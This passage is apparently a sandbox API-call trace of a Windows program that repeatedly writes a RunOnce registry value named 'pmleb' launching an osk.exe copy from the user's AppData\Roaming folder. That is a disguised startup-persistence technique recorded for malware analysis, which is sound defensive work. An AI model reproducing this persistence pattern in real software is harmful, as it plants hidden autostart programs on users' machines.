lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.620] RegCloseKey (hKey=0x280) returned 0x0 [0085.620] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.620] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.620] SetTimer (hWnd=0x20280, nIDEvent=0x21b1, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b1 [0085.620] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.634] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.634] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.634] KillTimer (hWnd=0x20280, uIDEvent=0x21b1) returned 1 [0085.634] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.635] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.635] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.635] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.635] RegCloseKey (hKey=0x280) returned 0x0 [0085.635] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.636] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.636] SetTimer (hWnd=0x20280, nIDEvent=0x21b2, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b2 [0085.636] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.697] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.697] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.698] KillTimer (hWnd=0x20280, uIDEvent=0x21b2) returned 1 [0085.698] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.698] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.698] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.699] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.699] RegCloseKey (hKey=0x280) returned 0x0 [0085.699] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.699] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.699] SetTimer (hWnd=0x20280, nIDEvent=0x21b3, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b3 [0085.699] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.712] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.712] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.713] KillTimer (hWnd=0x20280, uIDEvent=0x21b3) returned 1 [0085.713] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.713] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.714] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.714] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.714] RegCloseKey (hKey=0x280) returned 0x0 [0085.714] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.714] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.714] SetTimer (hWnd=0x20280, nIDEvent=0x21b4, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b4 [0085.714] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.727] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.727] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.728] KillTimer (hWnd=0x20280, uIDEvent=0x21b4) returned 1 [0085.728] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.728] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.728] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.729] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.729] RegCloseKey (hKey=0x280) returned 0x0 [0085.729] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.729] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.729] SetTimer (hWnd=0x20280, nIDEvent=0x21b5, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b5 [0085.729] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.744] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.744] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.745] KillTimer (hWnd=0x20280, uIDEvent=0x21b5) returned 1 [0085.750] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.750] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.750] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.750] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.751] RegCloseKey (hKey=0x280) returned 0x0 [0085.751] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.751] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.751] SetTimer (hWnd=0x20280, nIDEvent=0x21b6, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b6 [0085.751] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.759] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.759] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.759] KillTimer (hWnd=0x20280, uIDEvent=0x21b6) returned 1 [0085.759] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.760] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.760] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.760] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.760] RegCloseKey (hKey=0x280) returned 0x0 [0085.760] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.760] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.760] SetTimer (hWnd=0x20280, nIDEvent=0x21b7, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b7 [0085.760] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.774] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.774] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.775] KillTimer (hWnd=0x20280, uIDEvent=0x21b7) returned 1 [0085.775] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.775] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.775] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.776] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.776] RegCloseKey (hKey=0x280) returned 0x0 [0085.776] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.776] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.776] SetTimer (hWnd=0x20280, nIDEvent=0x21b8, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b8 [0085.776] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.790] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.790] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.790] KillTimer (hWnd=0x20280, uIDEvent=0x21b8) returned 1 [0085.790] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.791] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.791] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.791] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.791] RegCloseKey (hKey=0x280) returned 0x0 [0085.791] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.792] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.792] SetTimer (hWnd=0x20280, nIDEvent=0x21b9, uElapse=0xa, lpTimerFunc=0x0) returned 0x21b9 [0085.792] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.806] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.806] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.806] KillTimer (hWnd=0x20280, uIDEvent=0x21b9) returned 1 [0085.806] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.807] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.807] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.807] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.807] RegCloseKey (hKey=0x280) returned 0x0 [0085.807] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.808] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.808] SetTimer (hWnd=0x20280, nIDEvent=0x21ba, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ba [0085.808] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.822] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.822] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.822] KillTimer (hWnd=0x20280, uIDEvent=0x21ba) returned 1 [0085.822] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.823] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.823] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.823] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.823] RegCloseKey (hKey=0x280) returned 0x0 [0085.824] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.824] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.824] SetTimer (hWnd=0x20280, nIDEvent=0x21bb, uElapse=0xa, lpTimerFunc=0x0) returned 0x21bb [0085.824] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.837] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.837] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.837] KillTimer (hWnd=0x20280, uIDEvent=0x21bb) returned 1 [0085.837] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.838] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.838] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.838] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.838] RegCloseKey (hKey=0x280) returned 0x0 [0085.839] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.839] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.839] SetTimer (hWnd=0x20280, nIDEvent=0x21bc, uElapse=0xa, lpTimerFunc=0x0) returned 0x21bc [0085.839] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.854] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.854] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.855] KillTimer (hWnd=0x20280, uIDEvent=0x21bc) returned 1 [0085.855] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.855] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.855] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.856] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.856] RegCloseKey (hKey=0x280) returned 0x0 [0085.856] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.856] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.856] SetTimer (hWnd=0x20280, nIDEvent=0x21bd, uElapse=0xa, lpTimerFunc=0x0) returned 0x21bd [0085.856] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.868] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.868] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.868] KillTimer (hWnd=0x20280, uIDEvent=0x21bd) returned 1 [0085.869] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.869] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.869] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.869] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.870] RegCloseKey (hKey=0x280) returned 0x0 [0085.870] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.870] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.870] SetTimer (hWnd=0x20280, nIDEvent=0x21be, uElapse=0xa, lpTimerFunc=0x0) returned 0x21be [0085.870] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.884] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.884] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.884] KillTimer (hWnd=0x20280, uIDEvent=0x21be) returned 1 [0085.884] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.885] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.885] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.885] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.885] RegCloseKey (hKey=0x280) returned 0x0 [0085.885] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.886] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.886] SetTimer (hWnd=0x20280, nIDEvent=0x21bf, uElapse=0xa, lpTimerFunc=0x0) returned 0x21bf [0085.886] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.899] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.899] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.899] KillTimer (hWnd=0x20280, uIDEvent=0x21bf) returned 1 [0085.900] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.900] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.900] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.901] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.901] RegCloseKey (hKey=0x280) returned 0x0 [0085.901] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.901] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.901] SetTimer (hWnd=0x20280, nIDEvent=0x21c0, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c0 [0085.901] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.915] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.915] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.916] KillTimer (hWnd=0x20280, uIDEvent=0x21c0) returned 1 [0085.916] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.916] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.917] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.917] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.917] RegCloseKey (hKey=0x280) returned 0x0 [0085.917] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.917] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.917] SetTimer (hWnd=0x20280, nIDEvent=0x21c1, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c1 [0085.917] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.930] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.930] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.931] KillTimer (hWnd=0x20280, uIDEvent=0x21c1) returned 1 [0085.931] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.931] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.931] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.932] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.932] RegCloseKey (hKey=0x280) returned 0x0 [0085.932] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.932] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.932] SetTimer (hWnd=0x20280, nIDEvent=0x21c2, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c2 [0085.932] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.963] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.963] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.963] KillTimer (hWnd=0x20280, uIDEvent=0x21c2) returned 1 [0085.963] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.964] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.964] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.964] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.964] RegCloseKey (hKey=0x280) returned 0x0 [0085.964] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.965] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.965] SetTimer (hWnd=0x20280, nIDEvent=0x21c3, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c3 [0085.965] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.977] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.977] 